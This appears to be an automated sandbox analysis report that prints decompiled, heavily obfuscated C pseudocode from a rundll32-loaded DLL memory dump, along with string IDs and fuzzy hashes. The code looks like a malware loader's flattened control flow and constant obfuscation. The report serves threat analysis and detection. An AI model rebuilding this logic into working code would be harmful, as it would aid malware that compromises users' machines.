                                                                        				_v1656 = _v1656 >> 0xc;
                                                                        				_t537 = 0x2b;
                                                                        				_v1656 = _v1656 / _t537;
                                                                        				_v1656 = _v1656 ^ 0x00003e2a;
                                                                        				_v1664 = 0x8f26;
                                                                        				_v1664 = _v1664 >> 6;
                                                                        				_v1664 = _v1664 << 2;
                                                                        				_v1664 = _v1664 ^ 0x0000651c;
                                                                        				_v1728 = 0xe7d3;
                                                                        				_v1728 = _v1728 << 0xd;
                                                                        				_t538 = 0x2a;
                                                                        				_v1728 = _v1728 / _t538;
                                                                        				_v1728 = _v1728 ^ 0x00b0dbe1;
                                                                        				_v1592 = 0xd2ea;
                                                                        				_t539 = 0x52;
                                                                        				_v1592 = _v1592 / _t539;
                                                                        				_v1592 = _v1592 ^ 0x000f02ad;
                                                                        				_v1692 = 0x3985;
                                                                        				_t546 = _v1576;
                                                                        				_t490 = _v1576;
                                                                        				_t540 = _v1576;
                                                                        				_v1692 = _v1692 * 0x1b;
                                                                        				_v1692 = _v1692 ^ 0x0e34e665;
                                                                        				_v1692 = _v1692 ^ 0x0e32f760;
                                                                        				_v1616 = 0x5c84;
                                                                        				_v1616 = _v1616 >> 0xd;
                                                                        				_v1764 = 0x6db6;
                                                                        				_v1764 = _v1764 << 9;
                                                                        				_v1764 = _v1764 + 0xffff9705;
                                                                        				_v1764 = _v1764 | 0x2711d9d9;
                                                                        				_v1764 = _v1764 ^ 0x27dbdbdd;
                                                                        				_v1648 = 0x109c;
                                                                        				_v1648 = _v1648 + 0x526d;
                                                                        				_v1648 = _v1648 ^ 0x00006319;
                                                                        				while(1) {
                                                                        					L1:
                                                                        					_t522 = 0x5c;
                                                                        					do {
                                                                        						while(1) {
                                                                        							L2:
                                                                        							_t550 = _t491 - 0x29fd4c8c;
                                                                        							if(_t550 > 0) {
                                                                        								break;
                                                                        							}
                                                                        							if(_t550 == 0) {
                                                                        								_push(_t491);
                                                                        								E10001D54(_v1604, _t491, _v1676, _v1744, _v1580,  &_v1040, _v1612, _v1564);
                                                                        								_t547 =  &(_t547[8]);
                                                                        								_t491 = 0x1e06f250;
                                                                        								while(1) {
                                                                        									L1:
                                                                        									_t522 = 0x5c;
                                                                        									goto L2;
                                                                        								}
                                                                        							} else {
                                                                        								if(_t491 == 0x2d4cd3b) {
                                                                        									_t542 =  *0x100221b0 + 0x10;
                                                                        									while(1) {
                                                                        										__eflags =  *_t542 - _t522;
                                                                        										if(__eflags == 0) {
                                                                        											break;
                                                                        										}
                                                                        										_t542 = _t542 + 2;
                                                                        										__eflags = _t542;
                                                                        									}
                                                                        									_t540 = _t542 + 2;
                                                                        									_t491 = 0x2f9aa500;
                                                                        									continue;
                                                                        								} else {
                                                                        									if(_t491 == 0x10ed6b66) {
                                                                        										E1001F23C(_v1584, _t490, _v1656, _v1664, _v1728);
                                                                        									} else {
                                                                        										if(_t491 == 0x140b5383) {
                                                                        											E1001F23C(_v1620, _t546, _v1700, _v1668, _v1588);
                                                                        											_t547 =  &(_t547[3]);
                                                                        											L10:
                                                                        											_t491 = 0x10ed6b66;
                                                                        											while(1) {
                                                                        												L1:
                                                                        												_t522 = 0x5c;
                                                                        												goto L2;
                                                                        											}
                                                                        										} else {
                                                                        											_t554 = _t491 - 0x1e06f250;
                                                                        											if(_t491 != 0x1e06f250) {
                                                                        												goto L24;
                                                                        											} else {
                                                                        												_push(0x10001020);
                                                                        												_push(_v1672);
                                                                        												_t479 = E1001BF25(_v1644, _v1636, _t554);
                                                                        												E100173C0( &_v1560, _t554);
                                                                        												E10003482(_v1572, _t554,  &_v1040,  &_v520, _v1652, _v1596,  &_v1560,  *0x100221b0 + 0x234, 0x104,  *0x100221b0 + 0x10, _t479, _v1768, _v1716, _v1660);
                                                                        												E1001C5F7(_v1760, _v1628, _v1736, _v1708, _t479);
                                                                        												_t543 = _v1576;
                                                                        												_t547 =  &(_t547[0x11]);
                                                                        												_t491 = 0x2d4cd3b;
                                                                        												while(1) {
                                                                        													L1:
                                                                        													_t522 = 0x5c;
                                                                        													goto L2;
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							L27:
                                                                        							return _t543;
                                                                        						}
                                                                        						__eflags = _t491 - 0x2a58a6fb;
                                                                        						if(_t491 == 0x2a58a6fb) {
                                                                        							E1000620A(_v1732, _v1740, _v1748, _v1680, _t490, _t546);
                                                                        							_t547 =  &(_t547[4]);
                                                                        							_t491 = 0x140b5383;
                                                                        							_t522 = 0x5c;
                                                                        							goto L24;
                                                                        						} else {
                                                                        							__eflags = _t491 - 0x2f9aa500;
                                                                        							if(_t491 == 0x2f9aa500) {
                                                                        								_t473 = E1000DA66(_v1592, _t522, _v1688, _t491, _v1696);
                                                                        								_t490 = _t473;
                                                                        								_t547 =  &(_t547[3]);
                                                                        								__eflags = _t473;
                                                                        								if(__eflags != 0) {
                                                                        									_t491 = 0x38e9bb98;
                                                                        									goto L1;
                                                                        								}
                                                                        							} else {
                                                                        								__eflags = _t491 - 0x38e9bb98;
                                                                        								if(_t491 != 0x38e9bb98) {
                                                                        									goto L24;
                                                                        								} else {
                                                                        									_t489 = E1000BE98(_v1704, _t522, _v1600, _v1756, _v1608, _v1712, _t490, _v1720, _v1616, _v1764, _t540, _v1724, _t491, _v1772, _t491, _t491, _v1624, _t491, _v1632, _v1692,  &_v520, _t540, _v1640, _v1648, _v1752, _v1568);
                                                                        									_t546 = _t489;
                                                                        									_t547 =  &(_t547[0x18]);
                                                                        									__eflags = _t489;
                                                                        									if(__eflags == 0) {
                                                                        										goto L10;
                                                                        									} else {
                                                                        										_t491 = 0x2a58a6fb;
                                                                        										_t543 = 1;
                                                                        										_v1576 = 1;
                                                                        										while(1) {
                                                                        											L1:
                                                                        											_t522 = 0x5c;
                                                                        											goto L2;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L27;
                                                                        						L24:
                                                                        						__eflags = _t491 - 0x19ee210;
                                                                        					} while (__eflags != 0);
                                                                        					goto L27;
                                                                        				}
                                                                        			}


                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: *>$,$-C$2($9\/!$B/$Jul$Xdoo$Xdoo$Y$c@$lf$mR$u$w={Q$~'
                                                                        • API String ID: 0-1002547484
                                                                        • Opcode ID: adedfeae8c5d915a0a1bf16399041e1b234d3be2b24265e5e5cffc66a31987de
                                                                        • Instruction ID: a10887d5309f37cbec44b9bf97499b1ae25e94bdc5a0cbde92779140dd3b492f
                                                                        • Opcode Fuzzy Hash: adedfeae8c5d915a0a1bf16399041e1b234d3be2b24265e5e5cffc66a31987de
                                                                        • Instruction Fuzzy Hash: C832E1715083809FE3B8CF61C849A9BBBE1FBC5744F10891DE2DA96260D7B58949CF53
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 96%
                                                                        			E10011259(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
                                                                        				char _v64;
                                                                        				char _v128;
                                                                        				intOrPtr _v132;
                                                                        				intOrPtr _v136;
                                                                        				intOrPtr _v140;
                                                                        				intOrPtr _v144;
                                                                        				intOrPtr* _v148;
                                                                        				char _v152;
                                                                        				signed int _v156;
                                                                        				signed int _v160;
                                                                        				signed int _v164;
                                                                        				signed int _v168;
                                                                        				signed int _v172;
                                                                        				signed int _v176;
                                                                        				signed int _v180;
                                                                        				signed int _v184;
                                                                        				signed int _v188;
                                                                        				signed int _v192;
                                                                        				signed int _v196;
                                                                        				signed int _v200;
                                                                        				signed int _v204;
                                                                        				signed int _v208;
                                                                        				signed int _v212;
                                                                        				signed int _v216;
                                                                        				signed int _v220;
                                                                        				signed int _v224;
                                                                        				signed int _v228;
                                                                        				signed int _v232;
                                                                        				signed int _v236;
                                                                        				signed int _v240;
                                                                        				signed int _v244;
                                                                        				signed int _v248;
                                                                        				unsigned int _v252;
                                                                        				signed int _v256;
                                                                        				signed int _v260;
                                                                        				signed int _v264;
                                                                        				signed int _v268;
                                                                        				signed int _v272;
                                                                        				signed int _v276;
                                                                        				signed int _v280;
                                                                        				signed int _v284;
                                                                        				signed int _v288;
                                                                        				signed int _v292;
                                                                        				signed int _v296;
                                                                        				signed int _v300;
                                                                        				signed int _v304;
                                                                        				signed int _v308;
                                                                        				signed int _v312;
                                                                        				signed int _v316;
                                                                        				signed int _v320;
                                                                        				signed int _v324;
                                                                        				signed int _v328;
                                                                        				signed int _t456;
                                                                        				signed int _t460;
                                                                        				intOrPtr _t483;
                                                                        				intOrPtr* _t486;
                                                                        				void* _t490;
                                                                        				signed int _t533;
                                                                        				signed int _t534;
                                                                        				signed int _t535;
                                                                        				signed int _t536;
                                                                        				signed int _t537;
                                                                        				signed int _t538;
                                                                        				signed int _t539;
                                                                        				signed int _t540;
                                                                        				signed int _t541;
                                                                        				intOrPtr _t542;
                                                                        				void* _t543;
                                                                        				intOrPtr* _t550;
                                                                        				signed int* _t551;
                                                                        				signed int* _t552;
                                                                        
                                                                        				_t486 = __ecx;
                                                                        				_t551 =  &_v328;
                                                                        				_v144 = __edx;
                                                                        				_v148 = __ecx;
                                                                        				_v140 = 0x789b9f;
                                                                        				_v136 = 0;
                                                                        				_v132 = 0;
                                                                        				_v252 = 0x9c45;
                                                                        				_v252 = _v252 >> 0xa;
                                                                        				_v252 = _v252 + 0xdca;
                                                                        				_v252 = _v252 ^ 0x000071fb;
                                                                        				_v324 = 0x63fc;
                                                                        				_v324 = _v324 | 0x88cdde90;
                                                                        				_v324 = _v324 + 0x73bf;
                                                                        				_v324 = _v324 + 0xfe3;
                                                                        				_v324 = _v324 ^ 0x88cef902;
                                                                        				_v292 = 0x54b2;
                                                                        				_v292 = _v292 >> 0x10;
                                                                        				_v292 = _v292 | 0xe7a4c23a;
                                                                        				_v292 = _v292 ^ 0x9f79697b;
                                                                        				_v292 = _v292 ^ 0x78ddcaec;
                                                                        				_v192 = 0xd97d;
                                                                        				_v192 = _v192 * 0x68;
                                                                        				_t543 = 0x2ff3c5f1;
                                                                        				_v192 = _v192 ^ 0x005860dd;
                                                                        				_v276 = 0xcf22;
                                                                        				_t533 = 0x30;
                                                                        				_v276 = _v276 * 0x64;
                                                                        				_v276 = _v276 * 0x23;
                                                                        				_v276 = _v276 / _t533;
                                                                        				_v276 = _v276 ^ 0x003aac15;
                                                                        				_v200 = 0xe99;
                                                                        				_v200 = _v200 * 0x77;
                                                                        				_v200 = _v200 ^ 0x0006edd2;
                                                                        				_v316 = 0x8b49;
                                                                        				_v316 = _v316 << 5;
                                                                        				_v316 = _v316 | 0x25c31d21;
                                                                        				_v316 = _v316 * 0x76;
                                                                        				_v316 = _v316 ^ 0x6f7b91fa;
                                                                        				_v300 = 0x416c;
                                                                        				_v300 = _v300 ^ 0x0db1fc9b;
                                                                        				_v300 = _v300 | 0xf73ffbe5;
                                                                        				_v300 = _v300 ^ 0xffbfa19e;
                                                                        				_v232 = 0x7c56;
                                                                        				_v232 = _v232 << 7;
                                                                        				_v232 = _v232 | 0x65dc48c8;
                                                                        				_v232 = _v232 ^ 0x65fe4a93;
                                                                        				_v284 = 0xa4ad;
                                                                        				_v284 = _v284 + 0x3b34;
                                                                        				_v284 = _v284 | 0x46e5bf9e;
                                                                        				_v284 = _v284 + 0xaed;
                                                                        				_v284 = _v284 ^ 0x46e62dba;
                                                                        				_v308 = 0x51a5;
                                                                        				_v308 = _v308 + 0xffff7093;
                                                                        				_v308 = _v308 << 7;
                                                                        				_v308 = _v308 + 0x4d44;
                                                                        				_v308 = _v308 ^ 0xffe14d92;
                                                                        				_v216 = 0x9cb5;
                                                                        				_v216 = _v216 + 0xa1ba;
                                                                        				_v216 = _v216 ^ 0x7c221f2f;
                                                                        				_v216 = _v216 ^ 0x7c23012a;
                                                                        				_v248 = 0xb7b7;
                                                                        				_v248 = _v248 + 0xffff0c03;
                                                                        				_v248 = _v248 ^ 0x49401faf;
                                                                        				_v248 = _v248 ^ 0xb6bfcfdf;
                                                                        				_v268 = 0xf946;
                                                                        				_t534 = 0x23;
                                                                        				_v268 = _v268 / _t534;
                                                                        				_v268 = _v268 ^ 0x2bbfee68;
                                                                        				_v268 = _v268 << 0xa;
                                                                        				_v268 = _v268 ^ 0xffa5a976;
                                                                        				_v240 = 0x34aa;
                                                                        				_v240 = _v240 ^ 0x898fa139;
                                                                        				_t535 = 0x66;
                                                                        				_v240 = _v240 * 0xf;
                                                                        				_v240 = _v240 ^ 0x0f69dc7c;
                                                                        				_v328 = 0xae94;
                                                                        				_v328 = _v328 >> 0xd;
                                                                        				_v328 = _v328 ^ 0x36fbf0c7;
                                                                        				_v328 = _v328 | 0xa53cbb78;
                                                                        				_v328 = _v328 ^ 0xb7ffdef1;
                                                                        				_v208 = 0xbc8e;
                                                                        				_v208 = _v208 + 0x75c8;
                                                                        				_v208 = _v208 ^ 0x00011f72;
                                                                        				_v160 = 0x504a;
                                                                        				_v160 = _v160 ^ 0xbc1e1624;
                                                                        				_v160 = _v160 ^ 0xbc1e3fa8;
                                                                        				_v312 = 0xe1b9;
                                                                        				_v312 = _v312 ^ 0x616bd030;
                                                                        				_v312 = _v312 * 0x17;
                                                                        				_v312 = _v312 << 3;
                                                                        				_v312 = _v312 ^ 0x050b8b93;
                                                                        				_v172 = 0x434;
                                                                        				_v172 = _v172 >> 6;
                                                                        				_v172 = _v172 ^ 0x00007db4;
                                                                        				_v320 = 0x7186;
                                                                        				_v320 = _v320 / _t535;
                                                                        				_v320 = _v320 ^ 0x70a7bdd0;
                                                                        				_v320 = _v320 + 0xffffa3e3;
                                                                        				_v320 = _v320 ^ 0x70a70491;
                                                                        				_v224 = 0x741a;
                                                                        				_v224 = _v224 << 0xd;
                                                                        				_v224 = _v224 + 0xffff57ca;
                                                                        				_v224 = _v224 ^ 0x0e82cf00;
                                                                        				_v288 = 0xd06d;
                                                                        				_v288 = _v288 | 0x7ffffd7f;
                                                                        				_v288 = _v288 ^ 0x7fffa657;
                                                                        				_v296 = 0x1ceb;
                                                                        				_v296 = _v296 + 0x45c4;
                                                                        				_v296 = _v296 << 0xc;
                                                                        				_t536 = 0x1f;
                                                                        				_v296 = _v296 * 0x49;
                                                                        				_v296 = _v296 ^ 0xc23e624a;
                                                                        				_v164 = 0xac99;
                                                                        				_v164 = _v164 + 0xffff7636;
                                                                        				_v164 = _v164 ^ 0x000007a2;
                                                                        				_v304 = 0xffa9;
                                                                        				_v304 = _v304 << 0x10;
                                                                        				_v304 = _v304 / _t536;
                                                                        				_t537 = 0x2f;
                                                                        				_v304 = _v304 / _t537;
                                                                        				_v304 = _v304 ^ 0x002cccb4;
                                                                        				_v184 = 0x3467;
                                                                        				_v184 = _v184 ^ 0xc277e171;
                                                                        				_v184 = _v184 ^ 0xc277d8b3;
                                                                        				_v176 = 0xda70;
                                                                        				_v176 = _v176 + 0xffff1f30;
                                                                        				_v176 = _v176 ^ 0xffffb27f;
                                                                        				_v260 = 0xae02;
                                                                        				_v260 = _v260 << 0xc;
                                                                        				_v260 = _v260 * 0x50;
                                                                        				_v260 = _v260 ^ 0x660a4938;
                                                                        				_v256 = 0x63fd;
                                                                        				_v256 = _v256 + 0x38f;
                                                                        				_v256 = _v256 >> 0xc;
                                                                        				_v256 = _v256 ^ 0x000034b4;
                                                                        				_v280 = 0x1bf8;
                                                                        				_v280 = _v280 | 0x50a879c7;
                                                                        				_v280 = _v280 ^ 0xa62f7448;
                                                                        				_v280 = _v280 << 5;
                                                                        				_v280 = _v280 ^ 0xd0e1eb8a;
                                                                        				_v244 = 0x35;
                                                                        				_t538 = 0x63;
                                                                        				_v244 = _v244 * 0x70;
                                                                        				_v244 = _v244 << 4;
                                                                        				_v244 = _v244 ^ 0x000178e8;
                                                                        				_v156 = 0x4bd8;
                                                                        				_v156 = _v156 >> 0xa;
                                                                        				_v156 = _v156 ^ 0x00000c69;
                                                                        				_v272 = 0xcefd;
                                                                        				_v272 = _v272 << 4;
                                                                        				_v272 = _v272 * 0x45;
                                                                        				_v272 = _v272 + 0xffffd708;
                                                                        				_v272 = _v272 ^ 0x037c36fb;
                                                                        				_v196 = 0x7f21;
                                                                        				_v196 = _v196 * 0x5e;
                                                                        				_v196 = _v196 ^ 0x002ea2e9;
                                                                        				_v204 = 0xcb9f;
                                                                        				_v204 = _v204 / _t538;
                                                                        				_v204 = _v204 ^ 0x00000b3c;
                                                                        				_v168 = 0x3be2;
                                                                        				_v168 = _v168 + 0xffffc6dc;
                                                                        				_v168 = _v168 ^ 0x000064f9;
                                                                        				_v264 = 0xf83;
                                                                        				_v264 = _v264 >> 0xa;
                                                                        				_v264 = _v264 + 0xacf6;
                                                                        				_t539 = 0x33;
                                                                        				_v264 = _v264 / _t539;
                                                                        				_v264 = _v264 ^ 0x00007950;
                                                                        				_v236 = 0xe76d;
                                                                        				_t540 = 0x54;
                                                                        				_v236 = _v236 / _t540;
                                                                        				_t541 = 0x1b;
                                                                        				_v236 = _v236 * 0x11;
                                                                        				_v236 = _v236 ^ 0x00002164;
                                                                        				_v188 = 0xc970;
                                                                        				_v188 = _v188 / _t541;
                                                                        				_v188 = _v188 ^ 0x00007c4d;
                                                                        				_v212 = 0xdba3;
                                                                        				_v212 = _v212 ^ 0x3f6919ac;
                                                                        				_v212 = _v212 ^ 0x3cbdc81e;
                                                                        				_v212 = _v212 ^ 0x03d448c8;
                                                                        				_v220 = 0x9876;
                                                                        				_v220 = _v220 >> 5;
                                                                        				_v220 = _v220 * 0x3f;
                                                                        				_v220 = _v220 ^ 0x00015d8d;
                                                                        				_v180 = 0xda76;
                                                                        				_v180 = _v180 + 0xffffee50;
                                                                        				_v180 = _v180 ^ 0x0000c932;
                                                                        				_v228 = 0x4db6;
                                                                        				_v228 = _v228 >> 0xf;
                                                                        				_v228 = _v228 >> 0xc;
                                                                        				_v228 = _v228 ^ 0x00001ce0;
                                                                        				_t550 = _a4;
                                                                        				_t542 = _v144;
                                                                        				_t483 = _v144;
                                                                        				while(_t543 != 0xe3f9543) {
                                                                        					if(_t543 == 0x265bf3eb) {
                                                                        						_t456 = E10015A17(_v276,  &_v152, _v200, _v316);
                                                                        						_pop(_t490);
                                                                        						_push(_v308);
                                                                        						_t384 = (_t456 & 0x0000000f) + 4; // 0x4
                                                                        						E10014047(_t384, _v300, _v232, _t490, _v284,  &_v152,  &_v128);
                                                                        						 *((char*)(_t551 + (_t456 & 0x0000000f) + 0xf8)) = 0;
                                                                        						_t460 = E10015A17(_v216,  &_v152, _v248, _v268);
                                                                        						_t552 =  &(_t551[8]);
                                                                        						_t547 = _t460 & 0x0000000f;
                                                                        						_push(_v160);
                                                                        						_t397 = _t547 + 4; // 0x4
                                                                        						E10014047(_t397, _v240, _v328, _v216, _v208,  &_v152,  &_v64);
                                                                        						_push(_v320);
                                                                        						 *((char*)(_t552 + (_t460 & 0x0000000f) + 0x138)) = 0;
                                                                        						_push(_v172);
                                                                        						_t542 = _t542 + E1001E14D(_v224, __eflags, _v288, _v296,  &_v64, E10012164(0x10001534, _v312, __eflags), _v164, _v304, _v144,  &_v128, _v184, _t542);
                                                                        						E1001C5F7(_v176, _v260, _v256, _v280, _t464);
                                                                        						_t551 =  &(_t552[0x15]);
                                                                        						_t543 = 0xe3f9543;
                                                                        						L10:
                                                                        						_t486 = _v148;
                                                                        						continue;
                                                                        					}
                                                                        					if(_t543 == 0x2b2ac207) {
                                                                        						_push(_t486);
                                                                        						_t542 = E100157E8(_a4);
                                                                        						 *_t550 = _t542;
                                                                        						__eflags = _t542;
                                                                        						if(__eflags == 0) {
                                                                        							L16:
                                                                        							__eflags = 0;
                                                                        							return 0;
                                                                        						}
                                                                        						_t543 = 0x265bf3eb;
                                                                        						_t483 = _a4 + _t542;
                                                                        						goto L10;
                                                                        					}
                                                                        					if(_t543 == 0x2ff3c5f1) {
                                                                        						_v152 = E10017B6B();
                                                                        						_t543 = 0x30aa390f;
                                                                        						goto L10;
                                                                        					}
                                                                        					if(_t543 == 0x30aa390f) {
                                                                        						_t543 = 0x2b2ac207;
                                                                        						_a4 =  *((intOrPtr*)(_t486 + 4)) + 0x1000;
                                                                        						continue;
                                                                        					}
                                                                        					_t561 = _t543 - 0x3a71eb6b;
                                                                        					if(_t543 != 0x3a71eb6b) {
                                                                        						L15:
                                                                        						__eflags = _t543 - 0x15497eaf;
                                                                        						if(__eflags != 0) {
                                                                        							continue;
                                                                        						}
                                                                        						goto L16;
                                                                        					}
                                                                        					_push(_v168);
                                                                        					_push(_v204);
                                                                        					E1000D901(_v236, _t561, E10012164(0x10001474, _v196, _t561), _t542, _t483 - _t542, _v144, _v188);
                                                                        					E1001C5F7(_v212, _v220, _v180, _v228, _t478);
                                                                        					return 1;
                                                                        				}
                                                                        				E10009970(_v244,  *_t486, _v156, _t542,  *((intOrPtr*)(_t486 + 4)), _v272);
                                                                        				_t486 = _v148;
                                                                        				_t551 =  &(_t551[4]);
                                                                        				_t543 = 0x3a71eb6b;
                                                                        				_t542 = _t542 +  *((intOrPtr*)(_t486 + 4));
                                                                        				__eflags = _t542;
                                                                        				goto L15;
                                                                        			}

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4;$5$8If$DM$JP$M|$Py$V|$d!$g4$kq:$kq:$lA$m$;
                                                                        • API String ID: 0-568511501
                                                                        • Opcode ID: ffee52309dcb3b8a3776b9ae92b59ba598ef45fc93f80cf663b5faca067fc83c
                                                                        • Instruction ID: 7d87d4b9e6001df5490aca812dbbb1cc4364f445d9f358926f4f38338a9f55e9
                                                                        • Opcode Fuzzy Hash: ffee52309dcb3b8a3776b9ae92b59ba598ef45fc93f80cf663b5faca067fc83c
                                                                        • Instruction Fuzzy Hash: 4A2200715093809FE364CF25C98AA8BFBF1FBC5708F10891DE1999A2A0D7B59949CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E10002628(signed int __ecx, intOrPtr* __edx) {
                                                                        				short* _t400;
                                                                        				signed int _t408;
                                                                        				signed int _t412;
                                                                        				signed int _t413;
                                                                        				signed int _t414;
                                                                        				signed int _t415;
                                                                        				signed int _t416;
                                                                        				signed int _t417;
                                                                        				signed int _t418;
                                                                        				short _t457;
                                                                        				void* _t460;
                                                                        				intOrPtr* _t464;
                                                                        				void* _t466;
                                                                        
                                                                        				 *(_t466 + 0xa4) = 0x1cb5a8;
                                                                        				 *(_t466 + 0xa8) = 0x505ffa;
                                                                        				_t457 = 0;
                                                                        				 *(_t466 + 0xb0) = __ecx;
                                                                        				 *((intOrPtr*)(_t466 + 0xbc)) = 0;
                                                                        				_t464 = __edx;
                                                                        				 *(_t466 + 0x30) = 0x376c;
                                                                        				 *(_t466 + 0x30) =  *(_t466 + 0x30) << 3;
                                                                        				_t460 = 0xe980b9f;
                                                                        				 *(_t466 + 0x30) =  *(_t466 + 0x30) + 0xffff79a1;
                                                                        				 *(_t466 + 0x30) =  *(_t466 + 0x30) + 0x5a99;
                                                                        				 *(_t466 + 0x30) =  *(_t466 + 0x30) ^ 0x00018f98;
                                                                        				 *(_t466 + 0x7c) = 0xd2fb;
                                                                        				 *(_t466 + 0x7c) =  *(_t466 + 0x7c) + 0xc9d;
                                                                        				 *(_t466 + 0x7c) =  *(_t466 + 0x7c) ^ 0x0000df88;
                                                                        				 *(_t466 + 0x50) = 0x1f52;
                                                                        				 *(_t466 + 0x50) =  *(_t466 + 0x50) | 0x4d6b1b5a;
                                                                        				 *(_t466 + 0x50) =  *(_t466 + 0x50) >> 7;
                                                                        				 *(_t466 + 0x50) =  *(_t466 + 0x50) ^ 0x409ad63e;
                                                                        				 *(_t466 + 0x64) = 0xb688;
                                                                        				_t412 = 0x15;
                                                                        				 *(_t466 + 0x68) =  *(_t466 + 0x64) / _t412;
                                                                        				 *(_t466 + 0x68) =  *(_t466 + 0x68) ^ 0xfe7853c5;
                                                                        				 *(_t466 + 0x68) =  *(_t466 + 0x68) ^ 0xfe7823fa;
                                                                        				 *(_t466 + 0x14) = 0x1176;
                                                                        				_t413 = 0x74;
                                                                        				 *(_t466 + 0x14) =  *(_t466 + 0x14) * 0x26;
                                                                        				 *(_t466 + 0x14) =  *(_t466 + 0x14) + 0xffff909d;
                                                                        				 *(_t466 + 0x14) =  *(_t466 + 0x14) + 0xffffdc13;
                                                                        				 *(_t466 + 0x14) =  *(_t466 + 0x14) ^ 0x000201fd;
                                                                        				 *(_t466 + 0x94) = 0xba7a;
                                                                        				 *(_t466 + 0x94) =  *(_t466 + 0x94) << 0xa;
                                                                        				 *(_t466 + 0x94) =  *(_t466 + 0x94) ^ 0x02e990c5;
                                                                        				 *(_t466 + 0x24) = 0xa3c4;
                                                                        				 *(_t466 + 0x24) =  *(_t466 + 0x24) | 0x9ff723c2;
                                                                        				 *(_t466 + 0x24) =  *(_t466 + 0x24) / _t413;
                                                                        				 *(_t466 + 0x24) =  *(_t466 + 0x24) + 0x3928;
                                                                        				 *(_t466 + 0x24) =  *(_t466 + 0x24) ^ 0x01616723;
                                                                        				 *(_t466 + 0x1c) = 0x7213;
                                                                        				 *(_t466 + 0x1c) =  *(_t466 + 0x1c) | 0x351e9b59;
                                                                        				_t414 = 0x5f;
                                                                        				 *(_t466 + 0x18) =  *(_t466 + 0x1c) * 0x1d;
                                                                        				 *(_t466 + 0x18) =  *(_t466 + 0x18) >> 3;
                                                                        				 *(_t466 + 0x18) =  *(_t466 + 0x18) ^ 0x00904fb7;
                                                                        				 *(_t466 + 0x5c) = 0x297a;
                                                                        				 *(_t466 + 0x5c) =  *(_t466 + 0x5c) | 0x66c43148;
                                                                        				 *(_t466 + 0x5c) =  *(_t466 + 0x5c) + 0xbef6;
                                                                        				 *(_t466 + 0x5c) =  *(_t466 + 0x5c) ^ 0x66c4e3a8;
                                                                        				 *(_t466 + 0xa8) = 0xb108;
                                                                        				 *(_t466 + 0xa8) =  *(_t466 + 0xa8) + 0xffffb23b;
                                                                        				 *(_t466 + 0xa8) =  *(_t466 + 0xa8) ^ 0x00003984;
                                                                        				 *(_t466 + 0x60) = 0x972c;
                                                                        				 *(_t466 + 0x60) =  *(_t466 + 0x60) | 0x55a95463;
                                                                        				 *(_t466 + 0x60) =  *(_t466 + 0x60) << 3;
                                                                        				 *(_t466 + 0x60) =  *(_t466 + 0x60) ^ 0xad4eaf49;
                                                                        				 *(_t466 + 0x38) = 0xedfb;
                                                                        				 *(_t466 + 0x38) =  *(_t466 + 0x38) / _t414;
                                                                        				 *(_t466 + 0x38) =  *(_t466 + 0x38) + 0xffffecb7;
                                                                        				 *(_t466 + 0x38) =  *(_t466 + 0x38) << 0xe;
                                                                        				 *(_t466 + 0x38) =  *(_t466 + 0x38) ^ 0xfbce5bfc;
                                                                        				 *(_t466 + 0x44) = 0x5f66;
                                                                        				 *(_t466 + 0x44) =  *(_t466 + 0x44) << 8;
                                                                        				 *(_t466 + 0x44) =  *(_t466 + 0x44) * 0x4b;
                                                                        				 *(_t466 + 0x44) =  *(_t466 + 0x44) ^ 0x1bf2eb8b;
                                                                        				 *(_t466 + 0x74) = 0xc9a;
                                                                        				 *(_t466 + 0x74) =  *(_t466 + 0x74) + 0x2510;
                                                                        				 *(_t466 + 0x74) =  *(_t466 + 0x74) ^ 0x00001e79;
                                                                        				 *(_t466 + 0x58) = 0xe86a;
                                                                        				_t415 = 0x5c;
                                                                        				 *(_t466 + 0x5c) =  *(_t466 + 0x58) / _t415;
                                                                        				 *(_t466 + 0x5c) =  *(_t466 + 0x5c) + 0xffff7371;
                                                                        				 *(_t466 + 0x5c) =  *(_t466 + 0x5c) ^ 0xffff2425;
                                                                        				 *(_t466 + 0x84) = 0xcc82;
                                                                        				 *(_t466 + 0x84) =  *(_t466 + 0x84) + 0xc6d3;
                                                                        				 *(_t466 + 0x84) =  *(_t466 + 0x84) ^ 0x0001c52d;
                                                                        				 *(_t466 + 0xb0) = 0x36af;
                                                                        				_t408 = 0x79;
                                                                        				 *(_t466 + 0xac) =  *(_t466 + 0xb0) / _t408;
                                                                        				 *(_t466 + 0xac) =  *(_t466 + 0xac) ^ 0x00000e87;
                                                                        				 *(_t466 + 0x4c) = 0x72c3;
                                                                        				 *(_t466 + 0x4c) =  *(_t466 + 0x4c) + 0xfe00;
                                                                        				 *(_t466 + 0x4c) =  *(_t466 + 0x4c) + 0xffffcf74;
                                                                        				 *(_t466 + 0x4c) =  *(_t466 + 0x4c) ^ 0x00017982;
                                                                        				 *(_t466 + 0x88) = 0xe5b8;
                                                                        				 *(_t466 + 0x88) =  *(_t466 + 0x88) + 0xffff64c8;
                                                                        				 *(_t466 + 0x88) =  *(_t466 + 0x88) ^ 0x00004835;
                                                                        				 *(_t466 + 0x3c) = 0xe83b;
